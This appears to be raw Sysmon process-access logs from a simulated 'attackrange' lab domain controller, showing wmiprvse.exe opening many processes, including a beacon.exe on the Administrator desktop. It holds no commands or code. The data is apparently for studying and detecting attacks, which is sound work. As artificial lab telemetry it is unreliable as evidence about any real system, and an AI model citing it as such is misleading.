Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-4221-6170-F662-01000000F101}384C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2562-6170-855F-01000000F101}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EC-6170-2F5F-01000000F101}5272C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EC-6170-2E5F-01000000F101}6472C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EB-6170-2C5F-01000000F101}3800C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-FE47-616E-9A3C-01000000F101}2108C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-FA24-616E-E33B-01000000F101}5080C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-92C8-616D-4F11-01000000F101}5316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-ACEA-6164-3305-00000000F101}3452C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-88F7-6164-B700-00000000F101}4468C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8899-6164-8D00-00000000F101}3932C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8898-6164-8400-00000000F101}4980C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 